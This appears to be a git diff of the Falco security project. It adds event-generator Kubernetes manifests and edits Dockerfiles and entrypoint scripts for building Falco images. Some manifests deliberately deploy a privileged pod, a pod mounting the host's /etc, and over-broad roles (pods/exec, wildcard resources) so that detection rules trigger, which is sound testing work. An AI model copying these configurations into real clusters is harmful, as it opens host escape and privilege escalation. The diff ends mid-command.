+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-Privileged-Pod
+    message: Creating-deployment-with-privileged-true-pod
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: privileged-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: privileged-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      containers:
+        - securityContext:
+            privileged: true
+          name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/role-pod-exec.yaml

@@ -0,0 +1,17 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: pod-exec-role
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: pod-exec-role
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: ClusterRole-With-Pod-Exec-Created
+    message: Creating-role-that-can-exec-to-pods
+rules:
+- apiGroups:
+    - ""
+  resources:
+    - "pods/exec"
+  verbs:
+    - get

docker/event-generator/yaml/role-wildcard-resources.yaml

@@ -0,0 +1,17 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: wildcard-resources-role
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: wildcard-resources-role
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: ClusterRole-With-Write-Privileges-Created
+    message: Creating-role-with-wildcard-resources
+rules:
+- apiGroups:
+    - ""
+  resources:
+    - "*"
+  verbs:
+    - get

docker/event-generator/yaml/role-write-privileges.yaml

@@ -0,0 +1,17 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: write-privileges-role
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: write-privileges-role
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: ClusterRole-With-Write-Privileges-Created
+    message: Creating-role-with-write-privileges
+rules:
+- apiGroups:
+    - ""
+  resources:
+    - "pods"
+  verbs:
+    - create

docker/event-generator/yaml/sensitive-mount-deployment.yaml

@@ -0,0 +1,32 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: sensitive-mount-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: sensitive-mount-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: Create-Sensitive-Mount-Pod
+    message: Creating-deployment-with-pod-mounting-sensitive-path-from-host
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: sensitive-mount-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: sensitive-mount-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      containers:
+        - name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]
+          volumeMounts:
+            - mountPath: /host/etc
+              name: etc
+      volumes:
+        - name: etc
+          hostPath:
+            path: /etc

docker/event-generator/yaml/vanilla-configmap.yaml

@@ -0,0 +1,15 @@
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: vanilla-configmap
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-configmap
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-ConfigMap-Created
+    message: Creating-configmap
+data:
+  ui.properties: |
+    color.good=purple
+    color.bad=yellow
+    allow.textmode=true

docker/event-generator/yaml/vanilla-deployment.yaml

@@ -0,0 +1,25 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: vanilla-deployment
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-deployment
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Deployment-Created
+    message: Creating-deployment
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: vanilla-busybox
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: vanilla-busybox
+        app.kubernetes.io/part-of: falco-event-generator
+    spec:
+      containers:
+        - name: busybox
+          image: busybox
+          command: ["/bin/sh", "-c", "while true; do echo sleeping; sleep 3600; done"]

docker/event-generator/yaml/vanilla-role-rolebinding-serviceaccount.yaml

@@ -0,0 +1,46 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: vanilla-role
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-role
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Role.Clusterrole-Created
+    message: Creating-role
+rules:
+- apiGroups:
+    - ""
+  resources:
+    - "pods"
+  verbs:
+    - list
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: vanilla-role-binding
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-role-binding
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Role.Clusterrolebinding-Created
+    message: Creating-rolebinding
+roleRef:
+  kind: Role
+  name: vanilla-role
+  apiGroup: rbac.authorization.k8s.io
+subjects:
+  - kind: ServiceAccount
+    name: vanilla-service-account
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: vanilla-serviceaccount
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-serviceaccount
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Serviceaccount-Created
+    message: Creating-serviceaccount

docker/event-generator/yaml/vanilla-service.yaml

@@ -0,0 +1,16 @@
+apiVersion: v1
+kind: Service
+metadata:
+  name: vanilla-service
+  namespace: falco-event-generator
+  labels:
+    app.kubernetes.io/name: vanilla-service
+    app.kubernetes.io/part-of: falco-event-generator
+    falco.rules: K8s-Service-Created
+    message: Creating-service
+spec:
+  type: ClusterIP
+  ports:
+    - port: 80
+  selector:
+    app: busybox

docker/kernel/linuxkit/Dockerfile

@@ -0,0 +1,38 @@
+ARG ALPINE_VERSION=3.10
+ARG KERNEL_VERSION=4.9.184
+ARG FALCO_VERSION=0.19.0
+
+FROM linuxkit/kernel:${KERNEL_VERSION} AS ksrc
+FROM falcosecurity/falco:${FALCO_VERSION}-minimal as falco
+FROM alpine:${ALPINE_VERSION} AS probe-build
+LABEL maintainer="opensource@sysdig.com"
+ARG KERNEL_VERSION=4.9.184
+ARG FALCO_VERSION=0.19.0
+ENV FALCO_VERSION=${FALCO_VERSION}
+ENV KERNEL_VERSION=${KERNEL_VERSION}
+
+COPY --from=ksrc /kernel-dev.tar /
+COPY --from=falco /usr/src/falco-${FALCO_VERSION} /usr/src/falco-${FALCO_VERSION}
+
+RUN apk add --no-cache --update \
+  build-base gcc abuild binutils \
+  bc \
+  autoconf && \
+  export KERNELVER=`uname -r  | cut -d '-' -f 1`  && \
+  export KERNELDIR=/usr/src/linux-headers-${KERNEL_VERSION}-linuxkit/ && \
+  tar xf /kernel-dev.tar && \
+  cd $KERNELDIR && \
+  zcat /proc/1/root/proc/config.gz > .config && \
+  make olddefconfig && \
+  cd /usr/src/falco-${FALCO_VERSION} && \
+  make && \
+  apk del \
+  build-base gcc abuild binutils \
+  bc \
+  autoconf
+
+FROM alpine:${ALPINE_VERSION}
+ARG FALCO_VERSION=0.19.0
+ENV FALCO_VERSION=${FALCO_VERSION}
+COPY --from=probe-build /usr/src/falco-${FALCO_VERSION}/falco-probe.ko /
+CMD ["insmod","/falco-probe.ko"]

docker/kernel/probeloader/Dockerfile

@@ -0,0 +1,18 @@
+FROM golang:1.13-alpine AS build
+ARG FALCOCTL_REF=2be3df92edbac668284fe5c165ccb5bd6bf4e869
+
+RUN apk --no-cache add build-base git gcc ca-certificates
+
+RUN git clone https://github.com/falcosecurity/falcoctl.git /falcoctl
+
+WORKDIR /falcoctl
+
+RUN git checkout ${FALCOCTL_REF}
+RUN go mod vendor
+RUN CGO_ENABLED=0 GOOS=linux go build -a -o falcoctl -ldflags '-extldflags "-static"' .
+
+FROM scratch
+LABEL maintainer="opensource@sysdig.com"
+COPY --from=build /etc/ssl/certs/ca-certificates.crt /etc/ssl/certs/ca-certificates.crt
+COPY --from=build /falcoctl/falcoctl /falcoctl
+CMD ["/falcoctl", "install", "probe"]

docker/local/Dockerfile

@@ -1,7 +1,7 @@
-FROM debian:stable
+FROM debian:unstable
 
 LABEL usage="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
 ARG FALCO_VERSION=
 RUN test -n FALCO_VERSION
@@ -13,82 +13,84 @@ ENV HOME /root
 
 RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
-RUN apt-get update \
-	&& apt-get install -y --no-install-recommends \
-	bash-completion \
-	bc \
-	clang-7 \
-	ca-certificates \
-	curl \
-	dkms \
-	gnupg2 \
-	gcc \
-	jq \
-	libc6-dev \
-	libelf-dev \
-	libyaml-0-2 \
-	llvm-7 \
-	netcat \
-	xz-utils \
-	libmpc3 \
-	binutils \
-	libgomp1 \
-	libitm1 \
-	libatomic1 \
-	liblsan0 \
-	libtsan0 \
-	libmpx2 \
-	libquadmath0 \
-	libcc1-0 \
-	&& rm -rf /var/lib/apt/lists/*
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
 
-# gcc 6 is no longer included in debian stable, but we need it to
+RUN apt-get update \
+    && apt-get install -y --no-install-recommends \
+    bash-completion \
+    bc \
+    clang-7 \
+    ca-certificates \
+    curl \
+    dkms \
+    gnupg2 \
+    gcc \
+    jq \
+    libc6-dev \
+    libelf-dev \
+    libyaml-0-2 \
+    llvm-7 \
+    netcat \
+    xz-utils \
+    libmpc3 \
+    binutils \
+    libgomp1 \
+    libitm1 \
+    libatomic1 \
+    liblsan0 \
+    libtsan0 \
+    libmpx2 \
+    libquadmath0 \
+    libcc1-0 \
+    && rm -rf /var/lib/apt/lists/*
+
+# gcc 6 is no longer included in debian unstable, but we need it to
 # build kernel modules on the default debian-based ami used by
 # kops. So grab copies we've saved from debian snapshots with the
 # prefix https://snapshot.debian.org/archive/debian/20170517T033514Z
 # or so.
 
-RUN curl -L -o cpp-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-6_6.3.0-18_amd64.deb \
-	&& curl -L -o gcc-6-base_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6-base_6.3.0-18_amd64.deb \
-	&& curl -L -o gcc-6_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-6_6.3.0-18_amd64.deb \
-	&& curl -L -o libasan3_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libasan3_6.3.0-18_amd64.deb \
-	&& curl -L -o libcilkrts5_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libcilkrts5_6.3.0-18_amd64.deb \
-	&& curl -L -o libgcc-6-dev_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-6-dev_6.3.0-18_amd64.deb \
-	&& curl -L -o libubsan0_6.3.0-18_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libubsan0_6.3.0-18_amd64.deb \
-	&& curl -L -o libmpfr4_3.1.3-2_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpfr4_3.1.3-2_amd64.deb \
-	&& curl -L -o libisl15_0.18-1_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-1_amd64.deb \
-	&& dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
-	&& rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
+RUN curl -o cpp-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/cpp-6_6.3.0-18_amd64.deb \
+    && curl -o gcc-6-base_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6-base_6.3.0-18_amd64.deb \
+    && curl -o gcc-6_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/gcc-6_6.3.0-18_amd64.deb \
+    && curl -o libasan3_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libasan3_6.3.0-18_amd64.deb \
+    && curl -o libcilkrts5_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libcilkrts5_6.3.0-18_amd64.deb \
+    && curl -o libgcc-6-dev_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libgcc-6-dev_6.3.0-18_amd64.deb \
+    && curl -o libubsan0_6.3.0-18_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libubsan0_6.3.0-18_amd64.deb \
+    && curl -o libmpfr4_3.1.3-2_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libmpfr4_3.1.3-2_amd64.deb \
+    && curl -o libisl15_0.18-1_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-6-debs/libisl15_0.18-1_amd64.deb \
+    && dpkg -i cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb \
+    && rm -f cpp-6_6.3.0-18_amd64.deb gcc-6-base_6.3.0-18_amd64.deb gcc-6_6.3.0-18_amd64.deb libasan3_6.3.0-18_amd64.deb libcilkrts5_6.3.0-18_amd64.deb libgcc-6-dev_6.3.0-18_amd64.deb libubsan0_6.3.0-18_amd64.deb libmpfr4_3.1.3-2_amd64.deb libisl15_0.18-1_amd64.deb
 
-# gcc 5 is no longer included in debian stable, but we need it to
+# gcc 5 is no longer included in debian unstable, but we need it to
 # build centos kernels, which are 3.x based and explicitly want a gcc
 # version 3, 4, or 5 compiler. So grab copies we've saved from debian
 # snapshots with the prefix https://snapshot.debian.org/archive/debian/20190122T000000Z.
 
-RUN curl -L -o cpp-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/cpp-5_5.5.0-12_amd64.deb \
-	&& curl -L -o gcc-5-base_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
-	&& curl -L -o gcc-5_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/gcc-5_5.5.0-12_amd64.deb \
-	&& curl -L -o libasan2_5.5.0-12_amd64.deb	https://dl.bintray.com/falcosecurity/dependencies/libasan2_5.5.0-12_amd64.deb \
-	&& curl -L -o libgcc-5-dev_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
-	&& curl -L -o libisl15_0.18-4_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libisl15_0.18-4_amd64.deb \
-	&& curl -L -o libmpx0_5.5.0-12_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libmpx0_5.5.0-12_amd64.deb \
-	&& dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
-	&& rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
+RUN curl -o cpp-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/cpp-5_5.5.0-12_amd64.deb \
+    && curl -o gcc-5-base_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5-base_5.5.0-12_amd64.deb \
+    && curl -o gcc-5_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/gcc-5_5.5.0-12_amd64.deb \
+    && curl -o libasan2_5.5.0-12_amd64.deb	https://s3.amazonaws.com/download.draios.com/dependencies/libasan2_5.5.0-12_amd64.deb \
+    && curl -o libgcc-5-dev_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libgcc-5-dev_5.5.0-12_amd64.deb \
+    && curl -o libisl15_0.18-4_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libisl15_0.18-4_amd64.deb \
+    && curl -o libmpx0_5.5.0-12_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libmpx0_5.5.0-12_amd64.deb \
+    && dpkg -i cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb \
+    && rm -f cpp-5_5.5.0-12_amd64.deb gcc-5-base_5.5.0-12_amd64.deb gcc-5_5.5.0-12_amd64.deb libasan2_5.5.0-12_amd64.deb libgcc-5-dev_5.5.0-12_amd64.deb libisl15_0.18-4_amd64.deb libmpx0_5.5.0-12_amd64.deb
 
 # Since our base Debian image ships with GCC 7 which breaks older kernels, revert the
 # default to gcc-5.
 RUN rm -rf /usr/bin/gcc && ln -s /usr/bin/gcc-5 /usr/bin/gcc
 
 RUN rm -rf /usr/bin/clang \
-	&& rm -rf /usr/bin/llc \
-	&& ln -s /usr/bin/clang-7 /usr/bin/clang \
-	&& ln -s /usr/bin/llc-7 /usr/bin/llc
+    && rm -rf /usr/bin/llc \
+    && ln -s /usr/bin/clang-7 /usr/bin/clang \
+    && ln -s /usr/bin/llc-7 /usr/bin/llc
 
 # Some base images have an empty /lib/modules by default
 # If it's not empty, docker build will fail instead of
 # silently overwriting the existing directory
 RUN rm -df /lib/modules \
-	&& ln -s $HOST_ROOT/lib/modules /lib/modules
+    && ln -s $HOST_ROOT/lib/modules /lib/modules
 
 ADD falco-${FALCO_VERSION}-x86_64.deb /
 RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
@@ -98,15 +100,15 @@ RUN dpkg -i /falco-${FALCO_VERSION}-x86_64.deb
 RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
     && mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
 
-# debian:stable head contains binutils 2.31, which generates
+# debian:unstable head contains binutils 2.31, which generates
 # binaries that are incompatible with kernels < 4.16. So manually
 # forcibly install binutils 2.30-22 instead.
-RUN curl -L -o binutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils_2.30-22_amd64.deb \
-	&& curl -L -o libbinutils_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/libbinutils_2.30-22_amd64.deb \
-	&& curl -L -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
-	&& curl -L -o binutils-common_2.30-22_amd64.deb https://dl.bintray.com/falcosecurity/dependencies/binutils-common_2.30-22_amd64.deb \
-	&& dpkg -i *binutils*.deb \
-	&& rm -f *binutils*.deb
+RUN curl -s -o binutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils_2.30-22_amd64.deb \
+    && curl -s -o libbinutils_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/libbinutils_2.30-22_amd64.deb \
+    && curl -s -o binutils-x86-64-linux-gnu_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-x86-64-linux-gnu_2.30-22_amd64.deb \
+    && curl -s -o binutils-common_2.30-22_amd64.deb https://s3.amazonaws.com/download.draios.com/dependencies/binutils-common_2.30-22_amd64.deb \
+    && dpkg -i *binutils*.deb \
+    && rm -f *binutils*.deb
 
 # The local container also copies some test trace files and
 # corresponding rules that are used when running regression tests.

docker/local/docker-entrypoint.sh

@@ -16,6 +16,7 @@
 # limitations under the License.
 #
 
+# set -e
 
 # Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
 
@@ -24,11 +25,10 @@ if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
 
     for i in "$HOST_ROOT/usr/src"/*
     do
-        base=$(basename "$i")
-        ln -s "$i" "/usr/src/$base"
+        ln -s "$i" "/usr/src/$i"
     done
 
-    /usr/bin/falco-driver-loader
+    /usr/bin/falco-probe-loader
 fi
 
-exec "$@"
+exec "$@"

docker/minimal/Dockerfile

@@ -0,0 +1,58 @@
+FROM ubuntu:18.04 as ubuntu
+
+LABEL maintainer="opensource@sysdig.com"
+
+ARG FALCO_VERSION=0.19.0
+
+ENV FALCO_VERSION=${FALCO_VERSION}
+
+WORKDIR /
+
+ADD https://s3.amazonaws.com/download.draios.com/stable/tgz/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz /
+
+# ADD will download from URL and unntar
+RUN apt-get update && \
+    apt-get install -y libyaml-0-2 binutils && \
+    # curl -O https://s3.amazonaws.com/download.draios.com/stable/tgz/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    tar xfzv falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    rm -f falco-${FALCO_VERSION}-x86_64.tar.gz && \
+    mv falco-${FALCO_VERSION}-x86_64 falco && \
+    strip falco/usr/bin/falco && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/*
+
+FROM scratch
+
+COPY --from=ubuntu /lib/x86_64-linux-gnu/libanl.so.1 \
+    /lib/x86_64-linux-gnu/libc.so.6 \
+    /lib/x86_64-linux-gnu/libdl.so.2 \
+    /lib/x86_64-linux-gnu/libgcc_s.so.1 \
+    /lib/x86_64-linux-gnu/libm.so.6 \
+    /lib/x86_64-linux-gnu/libnsl.so.1 \
+    /lib/x86_64-linux-gnu/libnss_compat.so.2 \
+    /lib/x86_64-linux-gnu/libnss_files.so.2 \
+    /lib/x86_64-linux-gnu/libnss_nis.so.2 \
+    /lib/x86_64-linux-gnu/libpthread.so.0 \
+    /lib/x86_64-linux-gnu/librt.so.1 \
+    /lib/x86_64-linux-gnu/libz.so.1 \
+    /lib/x86_64-linux-gnu/
+
+COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libstdc++.so.6 \
+    /usr/lib/x86_64-linux-gnu/libstdc++.so.6
+
+COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libyaml-0.so.2.0.5 \
+    /usr/lib/x86_64-linux-gnu/libyaml-0.so.2
+
+COPY --from=ubuntu /etc/ld.so.cache \
+    /etc/nsswitch.conf \
+    /etc/ld.so.cache \
+    /etc/passwd \
+    /etc/group \
+    /etc/
+
+COPY --from=ubuntu /etc/default/nss /etc/default/nss
+COPY --from=ubuntu /lib64/ld-linux-x86-64.so.2 /lib64/ld-linux-x86-64.so.2
+
+COPY --from=ubuntu /falco /
+
+CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

docker/rhel/Dockerfile

@@ -0,0 +1,38 @@
+FROM registry.access.redhat.com/rhel7
+
+LABEL maintainer="opensource@sysdig.com"
+
+### Atomic/OpenShift Labels - https://github.com/projectatomic/ContainerApplicationGenericLabels
+LABEL name="falco" \
+    vendor="falcosecurity" \
+    url="http://falco.org/" \
+    summary="Container native runtime security" \
+    description="Falco is an open source project for intrusion and abnormality detection for Cloud Native platforms." \
+    run='docker run -d --name falco --restart always --privileged --net host --pid host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro -v /etc:/host/etc:ro --shm-size=350m registry.connect.redhat.com/sysdig/falco'
+
+COPY help.md /tmp/
+
+ENV HOST_ROOT /host
+ENV HOME /root
+
+ADD http://download.draios.com/stable/rpm/draios.repo /etc/yum.repos.d/draios.repo
+RUN rpm --import https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public && \
+    rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm && \
+    yum clean all && \
+    REPOLIST=rhel-7-server-rpms,rhel-7-server-optional-rpms,epel,draios \
+    INSTALL_PKGS="gcc dkms kernel-devel kernel-headers python golang-github-cpuguy83-go-md2man falco" && \
+    yum -y update-minimal --disablerepo "*" --enablerepo ${REPOLIST} --setopt=tsflags=nodocs \
+    --security --sec-severity=Important --sec-severity=Critical && \
+    yum -y install --disablerepo "*" --enablerepo ${REPOLIST} --setopt=tsflags=nodocs ${INSTALL_PKGS} && \
+    ### help file markdown to man conversion
+    go-md2man -in /tmp/help.md -out /help.1 && \
+    ### we delete everything on /usr/src/kernels otherwise it messes up docker-entrypoint.sh
+    rm -fr /usr/src/kernels && \
+    rm -df /lib/modules && ln -s $HOST_ROOT/lib/modules /lib/modules && \
+    yum clean all
+
+COPY ./docker-entrypoint.sh /
+
+ENTRYPOINT ["/docker-entrypoint.sh"]
+
+CMD ["/usr/bin/falco"]

docker/rhel/docker-entrypoint.sh

@@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+#
+# Copyright (C) 2019 The Falco Authors.
+#
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+# set -e
+
+# Set the SKIP_MODULE_LOAD variable to skip loading the kernel module
+
+if [[ -z "${SKIP_MODULE_LOAD}" ]]; then
+    echo "* Setting up /usr/src links from host"
+
+    for i in "$HOST_ROOT/usr/src"/*
+    do
+        ln -s "$i" "/usr/src/$i"
+    done
+
+    /usr/bin/falco-probe-loader
+fi
+
+exec "$@"

docker/rhel/help.md

@@ -0,0 +1,15 @@
+% falco (1) Container Image Pages
+% Falco Team
+% June, 2017
+
+# NAME
+falco \- Container Native runtime security
+
+# DESCRIPTION
+Falco is an open source project for intrusion and abnormality detection for Cloud Native platforms. See Falco website for more information: http://falco.org/
+
+# EXAMPLE
+    docker run -d --name falco --restart always --privileged --net host --pid host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro -v /etc:/host/etc:ro --shm-size=350m registry.connect.redhat.com/sysdig/falco
+
+# AUTHORS
+Falco Team

docker/slim-dev/Dockerfile

@@ -1,36 +1,35 @@
 FROM ubuntu:18.04
 
-LABEL maintainer="cncf-falco-dev@lists.cncf.io"
+LABEL maintainer="opensource@sysdig.com"
 
-LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name <name> <image>"
+ENV FALCO_REPOSITORY dev
 
-ARG FALCO_VERSION=latest
-ARG VERSION_BUCKET=deb
-
-ENV FALCO_VERSION=${FALCO_VERSION}
-ENV VERSION_BUCKET=${VERSION_BUCKET}
+LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
 
 ENV HOST_ROOT /host
+
 ENV HOME /root
 
 RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
 
+ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
+
 RUN apt-get update \
   && apt-get install -y --no-install-recommends \
-  # bash-completion \
-  # bc \
+  # 	bash-completion \
+  # 	bc \
   ca-certificates \
   curl \
   gnupg2 \
   jq \
-  # netcat \
-  # xz-utils \
+  # 	netcat \
+  # 	xz-utils \
   && rm -rf /var/lib/apt/lists/*
 
-RUN curl -s https://falco.org/repo/falcosecurity-3672BA8F.asc | apt-key add - \
-  && echo "deb https://dl.bintray.com/falcosecurity/${VERSION_BUCKET} stable main" | tee -a /etc/apt/sources.list.d/falcosecurity.list \
-  && apt-get update -y \
-  && if [ "$FALCO_VERSION" = "latest" ]; then apt-get install -y --no-install-recommends falco; else apt-get install -y --no-install-recommends falco=${FALCO_VERSION}; fi \
+RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
